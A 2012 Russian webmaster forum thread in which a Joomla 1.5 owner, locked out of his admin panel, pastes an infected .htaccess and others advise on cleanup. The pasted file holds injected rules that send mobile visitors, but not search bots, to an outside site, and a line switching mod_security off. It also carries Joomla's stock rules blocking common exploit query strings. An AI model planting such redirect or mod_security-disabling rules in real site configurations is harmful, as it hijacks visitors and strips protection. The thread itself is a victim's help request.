Войти

Войти | Регистрация
Поиск по сайту
Не могу зайти в админку сайта. Вирус?
Поиск  Правила 
Seo форум » Разработка сайтов » Взлом и защита
Страницы: 1
Не могу зайти в админку сайта. Вирус?
#1
9 Апреля 2012 12:37
Здравствуйте!  Сайт джумла 1.5 Перестал пускать в админку сайта. После введения правильного (и даже неправильного) пароля идет обновление страницы без какого-либо сообщения. 
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало. 
Плагины авторизации и com_uzers включены (везде стоит 1). Может отключены куки? Но я не знаю где это смотреть (буду благодарен, если подскажите). 

А сегодня зашел в файл .htaccess и увидел там такое (выделенным цветом). 

Код я удалил, но авторизироваться в админку все равно не могу. Не поскажите где еще теоретически нужно подчистить? :


RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} MIDP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Windows.CE [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteRule ^(.*)$ http://сайт.ru/ [L,R=302]
##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright © 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##


#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On


########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section
<IfModule mod_security.c> 
# Disable mod_security 
SecFilterEngine Off 
</IfModule>






Код я удалил, но авторизироваться в админку все равно не могу. Не поскажите где еще теоретически нужно подчистить?
Изменено: Андрюха - 9 Апреля 2012 12:43
#2
9 Апреля 2012 19:41
Цитата
Андрюха пишет:
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало.
Вы просто поменяли пароль в БД и рассчитывали, что такой же нужно будет вводить при заходе на сайт?
О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про
#3
10 Апреля 2012 13:01
Цитата
Yapy пишет:
Цитата
Андрюха пишет:
Я попробовал поменять пароль через PHPMyAdmin но это ничего не дало.
Вы просто поменяли пароль в БД и рассчитывали, что такой же нужно будет вводить при заходе на сайт?
Не-нет )) Я поменял в БД пароль администратора в плагине юзеров. Но там дело не в пароле. Потому-что страница авторизации на правильный и неправильный пароль не реагирует вообще никак. И зарегистрироваться на сайте тоже нельзя. Такое впечатление что отключены плагины авторизации и регистрации. Но я смотрел в БД - они все включены. 
А что Вы думаете насчет того кода в файле  .htaccess. Могло ли это повлиять? 
#4
10 Апреля 2012 13:32
Ну я б на вашем месте

1) дернул дернул бы только базу и папку images.

2) И на локал хосте собрал  бы новый сайт со всеми компонетнеами и модулями, что у вас сейчас стоят на сайте,  и импотнул бы старую базу, предварительно протестив ее антивирем

Ибо по ходу  Ваш сайт  не только ломанули но и понавнедряли всякую бяку + код попортили
#5
21 Мая 2012 14:04
Проверяй все файлы с расширением js.
Сам недавно чистил эту заразу. 
Проще всего все содержимое сайта скопируй в какую нибудь папку к себе на комп и напусти на нее kasperskiy removal tool.
Она эту дрянь видит но не лечит. Далее либо зараженные файлы js восстанавливать из бэкапа (мой случай) либо вручную править зараженные файлы.
Зараза свой код дописывает в конце. Но это муторно -  у меня было заражено штук по 150 на каждом сайте.
#6
22 Мая 2012 06:59
Гы, у меня такое на ВП было))) Пол дня голову ламал, потом админам (хостинга) тикет написал и спать пошел. С утра все было зашибись)))
 
Страницы: 1
Похожие темы:
  24.02.2015 16:53  Не могу избавиться от "вируса"
  07.05.2013 16:32  Не могу заблокировать чужой IP, почему-то блокируется мой собственный.
  20.04.2013 14:04  Помогите. Не могу удалить Fishing файлы в корневой папке Wordpress
  08.10.2012 14:48  не могу зайти на сайт
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
07:58 Яндекс Нейро и выдача в 2026 - остались ли лазейки для маленьких сайтов? 
05:00 узнать больше dm_avitos 
23:22 Рост эффективности моего интернет‑магазина 
23:12 Adsense личный опыт 
22:07 С чего сейчас проще начать? 
22:02 как оплатить claude и gpt-5 из рф в 2026 чтобы не забанили через три дня 
21:54 WB и Ozon - новые "русские поисковики"? Яндекс теряет коммерческую выдачу 
10:37 Русские народные сказки - оцените! 
09:01 Мониторинг обменников Сrypto-scout.io 
04:32 От $0.015 за IP | $0.68 за ГБ | 9PROXY.COM | 20+ млн резидентных прокси | 99,95% аптайм | Без чёрных списков 
21:08 Продам сотню хороших доменов по минимальным ценам 
20:43 JustProxy.Biz - Резидентные прокси без ограничения по трафику 
19:02 Mixmasters - Exchange without AML and KYC 
18:10 UltraXchina: Современный сервис обмена Alipay, USDT, Наличные 
10:26 Список обновленных тем пуст... 
22:55 С юмором по жизни! 
22:37 Чак Норрис ушел - 19 марта 2026, 86 лет, семья подтвердила 
22:19 8 марта: желаю аптайма 99.9% и e-e-a-t без локов 
21:16 Почему не обновляется счетчик ИКС (индекса качества сайта) 
19:57 молодильные яблоки и живая вода 
01:50 Точные прогнозы на футбол 
Апдейты
  • Яндекс ИКС Яндекс выдача 02.04.2026 (5 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 21.03.2026 (17 дней назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Бизнес на фоне санкций
—  Монетизация любого типа контента на YouTube. Adsense больше не нужен!
—  Развитие канала в Яндекс Дзен
—  Путь из слесаря в копирайтеры со своей командой
—  Заработок на Рутубе 2025


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050